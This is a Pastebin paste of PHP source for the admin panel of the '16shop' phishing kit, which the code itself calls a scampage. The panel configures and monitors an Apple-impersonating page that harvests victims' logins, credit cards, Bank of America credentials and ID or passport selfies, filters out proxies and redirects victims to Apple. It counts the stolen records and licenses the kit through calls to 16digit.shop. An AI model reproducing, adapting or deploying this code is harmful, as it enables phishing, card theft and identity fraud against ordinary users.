Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- source:https://pastebin.com/raw/WC2b2ByP
- output:
- ?><?php
- session_start();
- error_reporting(0);
- header("Content-Type: text/html; charset=UTF-8");
- $email = $_POST['email'];
- $password = $_POST['password'];
- $config = parse_ini_file('../key.ini');
- $key = $config['private_key'];
- $public_key = $config['public_key'];
- $page = $_GET['p'];
- $domain = preg_replace('/www\./i', '', $_SERVER['SERVER_NAME']);
- if (file_exists("../.config")){
- }else{
- $contents = load_conf();
- $tulis = fopen("../.config","a");
- fwrite($tulis,$contents);
- fclose($tulis);
- }
- ?>
- <html><head>
- <title>16shop - Admin Panel</title>
- <link rel="stylesheet" type="text/css" href="style.css"></head>
- <body>
- <?php if($page == "") {
- if(isset($_POST['email'])) {
- $login = login($_POST['email'], $_POST['password']);
- if($login == "valid") {
- $_SESSION['email'] = $_POST['email'];
- $_SESSION['password'] = $_POST['password'];
- }else{
- die("GAGAL LOGIN");
- }
- $valid = valid_key($domain,$key);
- if($valid == "valid") {
- echo "<script type='text/javascript'>window.top.location='?p=home';</script>";
- }else{
- echo "<script type='text/javascript'>window.top.location='?p=generate';</script>";
- }
- }
- if($public_key == "your_public_key") {
- echo '<br> <div class="content-center">
- <h2>## Enter your Public Key ##</h2>
- <form action="index.php?p=adduser" method="post">
- <div class="batas">
- <label><strong>Public Key</strong></label><br>
- <input style="width:320px;height:23px;" type="text" required="required" name="public_key" value="">
- </div>
- <div class="center">
- <input type="submit" class="button" value="Continue">
- </div>
- </form>
- </div>';
- }else{
- echo '<br> <div class="content-center">
- <h2>## priv8 login scampage ##</h2>
- <form method="post">
- <div class="batas">
- <label><strong>Email</strong></label><br>
- <input style="width:320px;height:23px;" type="email" required="required" name="email" value="">
- </div>
- <div class="batas">
- <label><strong>Password</strong></label><br>
- <input style="width:320px;height:23px;" type="password" required="required" name="password" value="">
- </div><br>
- <div class="center">
- <input type="hidden" name="token">
- <input type="submit" class="button" value="Masuk">
- </div>
- </form>
- </div>';
- }
- }
- if($page == "adduser") {
- $click = "../key.ini";
- $fps = fopen($click, "r");
- $contents = fread($fps, filesize($click));
- fclose($fps);
- $contents = str_replace("your_public_key",$_POST['public_key'],$contents);
- unlink("../key.ini");
- $tulis = fopen("../key.ini","a");
- fwrite($tulis,$contents);
- fclose($tulis);
- echo "<script type='text/javascript'>window.top.location='?p=';</script>";
- }
- if($page == "home") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- $valid = valid_key($domain,$key);
- if($valid == "valid") {
- $font = "<font color='green'><b>Active</font>";
- }else{
- $font = "<font color='red'><b>Inactive</font>";
- }
- echo '<br> <div class="content-center">
- <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
- <h2>## Status Domain ##</h2>
- <div class="batas">
- <label><strong>Domain</strong></label><br>
- <a href="https://'.$domain.'">'.$domain.'</a><br><br/>
- <label><strong>Status</strong></label><br>
- '.$font.'
- </div><br>
- </div>';
- }
- if($page == "generate") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- if(isset($_POST['domain'])) {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- $click = "../key.ini";
- $fps = fopen($click, "r");
- $contents = fread($fps, filesize($click));
- fclose($fps);
- $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
- unlink("../key.ini");
- unlink("../result/total_login.txt");
- unlink("../result/total_cc.txt");
- unlink("../result/total_photo.txt");
- unlink("../result/total_click.txt");
- unlink("../result/total_bank.txt");
- unlink("../result/log_visitor.txt");
- $tulis = fopen("../key.ini","a");
- fwrite($tulis,$contents);
- fclose($tulis);
- $user = $_SESSION['email'];
- $pass = $_SESSION['password'];
- $domain = $_POST['domain'];
- $license = sha1(md5($domain));
- register_key($user,$pass,$license,$domain);
- echo "<script type='text/javascript'>alert('Berhasil mendaftarkan domain');window.top.location='?p=home';</script>";
- }
- echo '<br> <div class="content-center">
- <a href="?p=generate">[Status]</a> <a href="?p=generate">[Setting]</a> <a href="?p=generate">[Notice]</a> <a href="?p=generate">[Statistic]</a> <a href="?p=logout">[Logout]</a>
- <h2>## Generate new key ##</h2>
- <p>Klik "Active" untuk mengaktifkan scampage</p>
- <form method="post">
- <div class="batas">
- <label><strong>Domain</strong></label><br>
- <a href="https://'.$domain.'">'.$domain.'</a>
- </div><br>
- <div class="center">
- <input type="hidden" name="domain" value="'.$domain.'">
- <input type="submit" class="button" value="Active">
- </div>
- </form>
- </div>';
- }
- if($page == "setting") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- if(isset($_POST['config'])) {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
- unlink("../.config");
- $tulis = fopen("../.config","a");
- fwrite($tulis,$_POST['config']);
- fclose($tulis);
- echo "<script type='text/javascript'>alert('Berhasil Menyimpan Settingan');window.top.location='?p=setting';</script>";
- }
- $setting = parse_ini_file('../.config');
- $click = "../.config";
- $file = fopen($click, "r");
- $contents = fread($file, filesize($click));
- fclose($file);
- echo '<br> <div class="content-center">
- <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
- <h2>## Setting your scampage ##</h2>
- <p>Klik "Save" untuk menyimpan konfigurasi</p>
- <p>1 = <font color="green">Aktif</font></p>
- <p>0 = <font color="red">Mati</font></p>
- <p>Keterangan:</p>
- <p>email = Email result kalian</p>
- <p>backup = Backup result ke file txt</p>
- <p>send_login = Mengirim result login ke email</p>
- <p>mix_result = Gabung Result Credit Card dan VBV</p>
- <p>proxy_block = Fitur block pengguna yang menggunakan proxy</p>
- <p>block = Block pengguna dan redirect ke situs apple setelah isi data</p>
- <p>site_password = Fitur site password, hanya redirect + password<br> kalian yang bisa akses scampage</p>
- <p>site_parameter = Fitur untuk membuka scampage dengan link khusus<br>ex: https://domainscampage.com/?16shop</p>
- <p>lock_lang = Fitur Lock Bahasa discampage (JP/CN/FR/ES) Defaultnya ALL</p>
- <p>grab_data = Mengambil data asli dari web resmi apple</p>
- <p>get_photo = Fitur Upload Photo Selfie ID/Driving License/Passport</p>
- <p>get_bank = Fitur Form Bank Login (Bank Of America)</p>
- <p>lock_platform = Fitur hanya pengguna Mac/iPhone/iPad/iPod yang<br> bisa bisa mengakses site</p>
- <p>double_cc = Fitur Input 2 Credit Card (1x Declined, 1x Valid)</p>
- <form method="post">
- <div class="batas">
- <label><strong>Config</strong></label><br>
- <textarea name="config" rows="25" cols="60">
- '.$contents.'
- </textarea>
- </div><br>
- <div class="center">
- <input type="submit" class="button" value="Save">
- </div>
- </form>
- </div>';
- }
- if($page == "notice") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- if(isset($_POST['noticeconfig'])) {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- $contents = str_replace($key,sha1(md5($_POST['domain'])),$contents);
- unlink("../lang.ini");
- $tulis = fopen("../lang.ini","a");
- fwrite($tulis,$_POST['noticeconfig']);
- fclose($tulis);
- echo "<script type='text/javascript'>alert('Berhasil Menyimpan Settingan');window.top.location='?p=notice';</script>";
- }
- $setting = parse_ini_file('../lang.ini');
- $click = "../lang.ini";
- $file = fopen($click, "r");
- $contents = fread($file, filesize($click));
- fclose($file);
- echo '<br> <div class="content-center">
- <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
- <h2>## Setting Notice ##</h2>
- <p>Klik "Save" untuk menyimpan konfigurasi</p>
- <form method="post">
- <div class="batas">
- <label><strong>Custom Notice</strong></label><br>
- <textarea name="noticeconfig" rows="25" cols="60">
- '.$contents.'
- </textarea>
- </div><br>
- <div class="center">
- <input type="submit" class="button" value="Save">
- </div>
- </form>
- </div>';
- }
- if($page == "statistic") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- $click = "../result/total_click.txt";
- $file = fopen($click, "r");
- $total_click = fread($file, filesize($click));
- $total_click = substr_count($total_click, "\n");
- fclose($file);
- if($total_click == 0) {
- $total_click = "<font color='red'>$total_click</font>";
- }else{
- $total_click = "<font color='green'>$total_click</font>";
- }
- $click = "../result/total_login.txt";
- $file = fopen($click, "r");
- $total_login = fread($file, filesize($click));
- $total_login = substr_count($total_login, "\n");
- fclose($file);
- if($total_login == 0) {
- $total_login = "<font color='red'>$total_login</font>";
- }else{
- $total_login = "<font color='green'>$total_login</font>";
- }
- $click = "../result/total_cc.txt";
- $file = fopen($click, "r");
- $total_cc = fread($file, filesize($click));
- $total_cc = substr_count($total_cc, "\n");
- fclose($file);
- if($total_cc == 0) {
- $total_cc = "<font color='red'>$total_cc</font>";
- }else{
- $total_cc = "<font color='green'>$total_cc</font>";
- }
- $click = "../result/total_bank.txt";
- $file = fopen($click, "r");
- $total_bank = fread($file, filesize($click));
- $total_bank = substr_count($total_bank, "\n");
- fclose($file);
- if($total_bank == 0) {
- $total_bank = "<font color='red'>$total_bank</font>";
- }else{
- $total_bank = "<font color='green'>$total_bank</font>";
- }
- $click = "../result/total_upload.txt";
- $file = fopen($click, "r");
- $total_photo = fread($file, filesize($click));
- $total_photo = substr_count($total_photo, "\n");
- fclose($file);
- if($total_photo == 0) {
- $total_photo = "<font color='red'>$total_photo</font>";
- }else{
- $total_photo = "<font color='green'>$total_photo</font>";
- }
- $click = "../result/log_visitor.txt";
- $file = fopen($click, "r");
- $log_visitor = fread($file, filesize($click));
- fclose($file);
- echo '<br> <div class="content-center">
- <a href="?p=home">[Status]</a> <a href="?p=setting">[Setting]</a> <a href="?p=notice">[Notice]</a> <a href="?p=statistic">[Statistic]</a> <a href="?p=logout">[Logout]</a>
- <h2>## Statistic ##</h2>
- <p>Click : '.$total_click.'</p>
- <p>Login : '.$total_login.'</p>
- <p>Credit Card : '.$total_cc.'</p>
- <p>Bank (Bank Of America) : '.$total_bank.'</p>
- <p>Photo CC/ID : '.$total_photo.'</p>
- <textarea rows="20" cols="60" disabled>'.$log_visitor.'</textarea>
- <div class="center">
- <a href="?p=resetdata" class="button">Reset Data</a>
- </div>
- </div>';
- }
- if($page == "logout") {
- session_destroy();
- echo "<script type='text/javascript'>window.top.location='?';</script>";
- }
- if($page == "resetdata") {
- if(!isset($_SESSION['email'])) {
- die("DONT BYPASS IT!");
- }
- unlink("../result/total_login.txt");
- unlink("../result/total_cc.txt");
- unlink("../result/total_photo.txt");
- unlink("../result/total_click.txt");
- unlink("../result/total_bank.txt");
- unlink("../result/log_visitor.txt");
- echo "<script type='text/javascript'>window.top.location='?p=statistic';</script>";
- }
- function login($username,$password) {
- $get = curl_init();
- $config = parse_ini_file('../key.ini');
- $key = $config['public_key'];
- curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/login.php");
- curl_setopt($get, CURLOPT_POST, 1);
- curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key");
- curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
- $server_output = curl_exec ($get);
- curl_close($get);
- return $server_output;
- }
- function register_key($username,$password,$your_key,$domain) {
- $get = curl_init();
- $config = parse_ini_file('../key.ini');
- $key = $config['public_key'];
- $ip = $_SERVER['SERVER_ADDR'];
- curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/reg_key.php");
- curl_setopt($get, CURLOPT_POST, 1);
- curl_setopt($get, CURLOPT_POSTFIELDS, "username=$username&password=$password&key=$key®_key=$your_key&ip_reg=$ip&domain=$domain");
- curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
- $server_output = curl_exec ($get);
- curl_close($get);
- return $server_output;
- }
- function valid_key($domain,$key) {
- $get = curl_init();
- curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/check_valid.php");
- curl_setopt($get, CURLOPT_POST, 1);
- curl_setopt($get, CURLOPT_POSTFIELDS, "domain=$domain&key=$key");
- curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
- $server_output = curl_exec ($get);
- curl_close($get);
- return $server_output;
- }
- function load_conf() {
- $get = curl_init();
- curl_setopt($get, CURLOPT_URL,"http://16digit.shop/api/scama/config.txt");
- curl_setopt($get, CURLOPT_RETURNTRANSFER, true);
- $server_output = curl_exec ($get);
- curl_close($get);
- return $server_output;
- }
- ?>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement